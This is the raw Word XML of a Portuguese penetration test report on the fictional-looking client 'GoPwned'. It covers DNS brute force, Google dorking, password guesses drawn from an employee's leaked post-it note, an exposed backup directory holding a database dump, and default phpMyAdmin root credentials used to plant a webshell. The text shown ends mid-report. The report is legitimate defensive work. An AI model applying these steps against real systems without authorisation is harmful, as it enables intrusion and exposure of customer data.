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20.0" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8720"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8720"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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Relatório de Pentest.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="80"/>
                <w:szCs w:val="80"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (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Teste de Intrusão)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Cliente: GoPwned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CrowSec – Segurança Ofensiva</w:t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851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20/10/2019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40"/>
          <w:szCs w:val="1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rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">20 de outubro de 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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Att.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015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Sr. Mark Henning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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GoPwned – Fitness Company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Considerações iniciais</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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Através deste presente relatório apresentamos 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Relatório de Pentest (Teste de Intrusão)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segundo o escopo definido pela proposta aprovada pelas partes envolvidas nesta análise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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Carlos Eduardo Vieira</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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Founder &amp; Penetration Tester </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E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2 - Introdução e objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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CrowSec foi contratada para conduzir um PENTEST nos sistemas da CrowSec. A avaliação foi conduzida de maneira a simular um ataque malicioso com objetivo de determinar o impacto que falhas de segurança podem ter no que diz respeito à integridade, disponibilidade e confidencialidade do negócio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr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2.1 -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acordo com o combinado e acordado entre as partes, o PENTEST escolhido foi do tipo BLACKBOX (Sem conhecimento de informações), ou seja, a única informação oferecida pela CONTRATANTE foi o site da empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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gopwned.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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CONTRATANTE deu liberdade para que o teste inicie a partir do SITE e tem conhecimento que a CONTRATADA tem permissão de acessar seus ativos (servidores e serviços) internos desde que o ataque tenha sido iniciado através do SITE principal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037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objetivo deste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tipo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BLACKBOX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conduzir uma simulação de ataque malicioso da maneira que seja possível determinar o impacto que as falhas de segurança possam apresentar na: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Integridade dos sistemas da companhia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confidencialidade das informações de clientes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57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 infraestrutura interna e disponibilidade dos sistemas e serviços</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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resultado dessa avaliação deve ser usado para mitigação dessas falhas a fim de minimizar os riscos e melhorar a segurança.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2.2 - Limitações de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impostas pela CONTRATANTE foram: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Ataques DoS e DDoS (Negação de Serviço) (visto que outra empresa presta suporte a disponibilidade de seus sistemas)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57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Ataques de Engenharia Social (pois objetivo principal da contratante é medir o nível de segurança de seu ambiente sem depender do fator de erro humano)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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2.3 - Responsabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042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trabalho desenvolvido pela CrowSec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tem como objetivo corrigir as possíveis vulnerabilidades, nem proteger a CONTRATANTE contra ataques internos e externos, nosso objetivo é fazer um levantamento dos riscos e recomendar formas para minimizá-los.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043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recomendações sugeridas neste relatório devem ser testadas e validadas pela equipe técnica da empresa CONTRATANTE antes de serem implantadas em ambiente em produção. A CrowSec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 se responsabiliza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pela implantação e possíveis impactos que possam vir a ocorrer em outras aplicações ou serviços.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044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2.4 - Metodologia </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045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metodologia utilizada neste teste visa analisar os níveis de proteção implantados, iniciando sem nenhuma informação disponibilizada pela empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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teste se inicia na fase de COLETA DE INFORMAÇÕES, onde se colhe informações públicas sobre alvo, depois passamos para a fase de reconhecimento e identificação da aplicação, onde identificamos versões de software, tipo dos sistemas, arquitetura etc, após isso iniciamos uma varredura manual para encontrar possíveis vetores de entrada e posteriormente planejarmos o ataque, somente após esse reconhecimento se inicia a fase de detecção de vulnerabilidades e posteriormente a exploração e pós-exploração e validação do risco.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- Sumário executivo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A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resultados das avaliações efetuadas na aplicação a partir da internet, demonstram que a empresa possui sérios riscos de segurança no qual a presença de vulnerabilidades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GRAVES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compromete o sigilo de informações sensíveis e a imagem da empresa GOPWNED.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B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3.1 - Resumo das ameaças</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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Através da internet foi possível localizar uma aplicação de gerenciamento de banco de dados com uma senha padrão que permitiu acesso a rede interna, comprometendo todos os servidores da infraestrutura, contando com o site principal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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- Resultado do Trabalho - Análise Técnica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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 – Coleta de Informação </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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Iniciamos a coleta de informação do ambiente a fim de levantar informações sobre o ambiente.</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">o domínio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www.crowsec.com.br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respondia para o IP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104.24.99.192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ao fazer uma pesquisa por IP descobrimos que o IP é da cloudflare (WAF e proteção WEB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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Acessando o site da empresa podemos obter informações importantes como alguns e-mails da empresa: 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contato@gopwned.com.br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amanda.pires@gopwned.com.br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Consultando o DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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de DNS não permitia a realização da Transferência de zona com isso não foi possível conseguir acesso a todas as entradas DNS usando esta técnica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F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isso usamos uma técnica de brute force de DNS e encontramos as seguintes entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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52"/>
        <w:gridCol w:w="4252"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4252"/>
            <w:gridCol w:w="4252"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3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Brute force de DNS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www.gopwned.com.br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104.24.99.192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backup.gopwned.com.br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144.91.84.64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system.backup.com.br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144.91.84.63</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069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851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Pesquisa pública usando a técnica de Google Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D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Consulta:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="8720.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0.0" w:type="dxa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8720"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8720"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="851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site:linkedin.com intext:"em Gopwned"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resultados de pesquisa conseguimos encontrar um dos funcionários da empresa no Linkedin “Amanda Pires”, no perfil desde funcionários contém algumas informações que poderiam ser confidenciais: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/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https://www.linkedin.com/in/amanda-pires-063459195/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15533" cy="4305901"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Uma imagem contendo laptop, equipamentos eletrônicos, interior, computador&#10;&#10;Descrição gerada automaticamente" id="489" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Uma imagem contendo laptop, equipamentos eletrônicos, interior, computador&#10;&#10;Descrição gerada automaticamente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0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Nesta imagem podemos notar que a funcionária da empresa publicou em uma rede social, dados confidenciais como uma planilha financeira e uma possível senha anotada em um post-it.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074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anotação no post-it contém a informação: “Amanda 2019”, com isso seria possível realizar alguns testes usando este padrão, como por exemplo: “amanda2019, amanda@2019, Amanda2019”.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="851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verificação dos sub-domínios entrados durante os testes, identificamos que o system.gopwned.com.br (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Akaunting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:b w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Software de contabilidade gratuito</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)  é o sistema de contabilidade da empresa, realizamos alguns testes com o e-mail da Amanda que localizamos no site da empresa e as possíveis senhas, mas nenhuma das tentativas foi possível ganhar acesso ao sistema da empresa. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.536hhrrr4szz" w:id="1"/>
      <w:bookmarkEnd w:id="1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8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ngs8lmb9pnpb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Na fase de enumeração e identificação de vulnerabilidades, identificamos que o arquivo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http://system.gopwned.com.br/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que está no servidor do sistema está bloqueando o acesso às seguintes URL’s para os robôs de pesquisa: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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.iv3hwfhy959" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /phpmyadmin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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qpkrg97pvds5" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /admin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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tktbt491jfll" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /mysqladmin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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.khpe3ib68dkj" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disallow: /backup/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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1s8nlucahd6m" w:id="7"/>
      <w:bookmarkEnd w:id="7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E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.n33gj9ek1ti4" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Identificamos o que cada  URL faz: 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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9w88cyf0a6uz" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/phpmyadmin - Página com acesso bloqueado (ERRO 403)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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.v8ioydtqrxav" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin - Página de acesso administrativo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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.32p0i9fu92p9" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mysqladmin - Página do PHPMYADMIN </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Sistema de gerenciamento de banco de dados)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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.l46n4z7qowp" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/backup - Página com “INDEX OF” habilitado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gqq9pv6ekk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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5nh402qgbd9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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s1vz3ai2wnp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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w3fr7s808fv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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.70xcu1mfat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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1zchpp81n70e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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9lut6cd7gt6n" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5) Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1th4t0k8rr2b" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1) Testando PHPMYADMIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.stlv4c2izak7" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Na  página “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http://system.gopwned.com.br/backup/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” é possivel verificar que existe um arquivo com o DUMP de todas as informações do banco de dados do sistema, possibilitando qualquer pessoas na internet acessar todas as informações dos clientes, logins e senhas para acessos no sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4jotjo29ju95" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identificamos no painel de administração do banco de dados (PHPMYADMIN) que o mesmo está com o login e senha padrão:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.20w3yp2aj5kc" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login: root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nu8xvqo8ptzw" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Senha: em branco</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3e33jq399d0c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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.o6id59x00m4h" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Usando este login e senha é possível acessar o banco de dados do sistema com as credenciais administrativas “root”, alterar e até deletar todos os dados do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8zoxm54mqmdd" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Usando este sistema um atacante pode injetar um código malicioso dentro do servidor, durante a fase de exploração identificamos e realizamos uma PoC (Prova de conceito) a fim de ganhar acesso no servidor do sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s51ulo88xhih" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Durante os testes criamos o arquivo webshell.php dentro do servidor principal usando comandos SQL: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.toskzqzzkh7" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5402580" cy="1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8ule4xafaf85" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usando este comando criamos o arquivo webshell.php onde é possível executar comandos dentro do servidor de forma passiva, como é possível ver no exemplo abaixo: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ncgiypgsu4h7" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
